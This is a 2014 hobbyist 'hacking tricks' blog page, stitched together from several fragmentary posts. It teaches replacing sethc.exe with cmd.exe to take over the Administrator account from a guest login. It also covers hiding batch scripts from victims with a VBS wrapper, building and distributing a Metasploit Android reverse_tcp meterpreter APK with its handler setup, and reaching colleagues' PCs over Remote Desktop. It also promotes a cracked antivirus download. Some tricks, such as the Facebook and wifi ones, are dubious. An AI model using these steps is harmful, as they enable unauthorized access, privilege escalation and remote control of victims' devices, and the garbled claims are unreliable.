Saturday 18 October 2014

Nod 32 4.0 Antivirus Full Registerd...
Download it by given link..
adf .ly/qHyA8 (remove space)
Hacking Administrator password
using guest account...
Hacking Administrator password
using guest account..
METHOD 1
1) Go to C:/windows/system32
2) Copy cmd.exe and paste it on desktop
3) Rename cmd.exe to sethc.exe
4) Copy the new sethc.exe to system32
folder, when windows asks for overwriting
the file, then click YES
5) Now Log out from your guest account and
at the user select window, press shift key 5
times
6) Instead of Sticky Key confirmation
dialogue, command prompt with full
administrator privileges will open
7) Now type "NET USER ADMINISTRATOR"
pass "" where "pass" can be any password
you like and press enter.
You will see "The Command completed
successfully" and then exit the command
prompt and login into administrator with
your new password.
You have hacked admin through guest
account.
METHOD 2
1. Right-click on "My Computer" icon on the
desktop OR in the Start Menu
2. Select the option "Manage"
3. On the left pane expand the "Computer
Management (Local) tree"
4. Double click "Local Users and Groups"
option From "System Tools" tree
5. Click the "Users" option
6. Now you will see the list of users on the
right side pane, such as Administrator, Guest
etc
7. Right click the "Administrator" and select
the option "Set Password" option
8. Now you will see a warning message, Click
on proceed
9. Now the system asks you for "New
Password" and "Confirm Password"
10. After entering the password click on
"OK". The password is changed.
You have successfully changed the
Administrator password.

A hacker

A hacker also
sometimes need to hide
their script in the
background, because
they don't want the
victim become
suspicious if something
popped out in their
window, since any
command prompt
window will be visible
until the .BAT/.CMD file
execution is complete.
Requirement:
1. Notepad or any other
text editor
How to Invisibly
Execute BAT File in
the Background:
1. Let say I will ping
google.com by utilizing
BAT script.
ping
www.google.com
and then save as
ping.bat
2. When we double click
the ping.bat we've just
created, a command
prompt window will
popped out and pinging
google.com.
and the window will
automaticaly closed
after the execution is
complete.
3. We will utilize
Windows Script Host
RUN method to invisibly
execute BAT file in the
background. This is the
script
Set WshShell =
CreateObject
("WScript.Shell")
WshShell.Run chr
(34) & "C:\ping.bat"
& Chr(34), 0
Set WshShell =
Nothing
save the script as
hidden.vbs with .vbs
extension.
4. I've modified the BAT
script a little bit,
because we need to
check whether the
script was successfully
executed or not.
ipconfig >
result.txt
all IP configuration
result will be saved into
result.txt file.
5. When we execute the
hidden.vbs, no window
popped out and if our
script was successfully
executed in the
background, in our
folder location should
have a new file
result.txt contained
with information about
windows ip
configuration.
Hope it's useful
Share this article if
you found this post
was useful:
Here is some initial
information for this
tutorial:
Attacker IP address:
192.168.8.94
Attacker port to receive
connection: 443
Requirements:
1. Metasploit
framework (we use Kali
Linux 1.0.6 in this
tutorial)
2. Android smartphone
(we use HTC One
android 4.4 KitKat)
Step by Step Hacking
Android Smartphone
Tutorial using
Metasploit:
1. Open terminal (CTRL +
ALT + T) view tutorial
how to create linux
keyboard shortcut
.
2. We will utilize
Metasploit payload
framework to create
exploit for this tutorial.
msfpayload
android/
meterpreter/
reverse_tcp
LHOST=<attacker_
ip_address>
LPORT=<port_to_
receive_
connection>
As described above
that attacker IP
address is 192.168.8.94,
below is our screenshot
when executed the
command
3. Because our payload
is reverse_tcp where
attacker expect the
victim to connect back
to attacker machine,
attacker needs to set
up the handler to handle
incoming connections to
the port already
specified above. Type
msfconsole to go to
Metasploit console.
Info:
use exploit/multi/
handler –> we will
use Metasploit
handler
set payload
android/
meterpreter/
reverse_tcp –>
make sure the
payload is the
same with step 2
4. The next step we
need to configure the
switch for the
Metasploit payload we
already specified in step
3.
Info:
set lhost
192.168.8.94 –>
attacker IP
address
set lport 443 –>
port to listen the
reverse connection
exploit –> start to
listen incoming
connection
5. Attacker already
have the APK's file and
now he will start
distribute it (I don't
need to describe how to
distribute this file,
internet is the good
place for distribution ).
6. Short stories the
victim (me myself)
download the malicious
APK's file and install it.
After victim open the
application, attacker
Metasploit console get
something like this:
7. It's mean that
attacker already inside
the victim android
smartphone and he can
do everything with
victim phone.
See the video below if
you are not clear about
the step by step
Hacking Android
Smartphone Tutorial
using Metasploit above:
Conclusion:
1. Don't install APK's
from the unknown
source.
2. If you really want to
install APK's from
unknown source, make
sure you can view, read
and examine the source
code. The picture below
is the source code of
our malicious APK's in
this tutorial.
Share this post if you
found it useful
Share this article if
you found this post
was usefu
Hack Victim
Computer
Coming Up >> Hack
Computer via Trojans
& Keyloggers
How To Hack &
Access Same LAN
Computers ?
If you are working in
Office / Colleges and
want to hack your
friends & college
mate PC then here is
a trick.
First Step press win+ R
Go to Run> Type Cmd
now type command
net view
It will be look as below
C:\>net view
Server Name Remark
------------------------------
-----------------
\\xyz
\\abc
Here you can get all the
names of all the
computers machine
names which connect
with your LAN.
Now you got the name.
Lets start hacking into
the systems.
After you get server
name now type tracert
command for knowing
IP of the victim
machine.
Example: C:\> tracert
xyz
Here you get the IP
address of the XYZ
computer machine.
Now go to windows
start button and type
Remote Desktop
Connection
After click on Remote
Desktop Connection
you get below image..
Now type the IP
address or computer
name of victim machine.
Click on Connect <-|
It will also ask
administrator password
which is common as
usual you known about.
After few second
Victim machine shown
in your Computer..
Now you can access
that machine to open
website, files,
Software's, etc
Enjoy the trick..

How to send Messages to the Persons who Blocked you On Facebook?

How to send Messages to the Persons who Blocked you On Facebook?
1) The first main thing u have to know is the Profile Name of the person who blocked you.....

2) For the profile name just open the profile of the person who Blocked you....

3) Here is the main step, now in the address bar you will find something Like this ...

www.facebook.com/xxxxxxxxxxxx

4) Here the xxxxxxxxxxx is the profile name of the person who blocked you....

5)You can even get this profile name in the about info of the person who blocked you...It will be sumthing as shown below

xxxxxxxxxxxx@facebook.com

6)Now go to your Mail Account...(Gmail, Yahoo,Outlook...)

7)Now compose a New Mail

8)In the To address type the mail id as shown below

Profilename@facebook.com

in my example it is xxxxxxxxxxxx@facebook.com

8)Now type the message you want to send in the subject field and click send

9)That's it your message will be sent to the facebook inbox directly...
... :

How to hack wifi password using android phone.

How to hack wifi password using android phone.
<fg=bbbbbb00> Just root your phone by using "shark" application. And then install "wifi sniffer" and run it. Select wifi connection and click on start. Wait for a while. It will show you wifi key or connect you to wifi.
Note: download and root your phone at your own risk.
Reguards:RANA MEHAR ALI

 

Copyright @ 2013 ALI HACKING TRICKS BY RANA MEHAR ALI.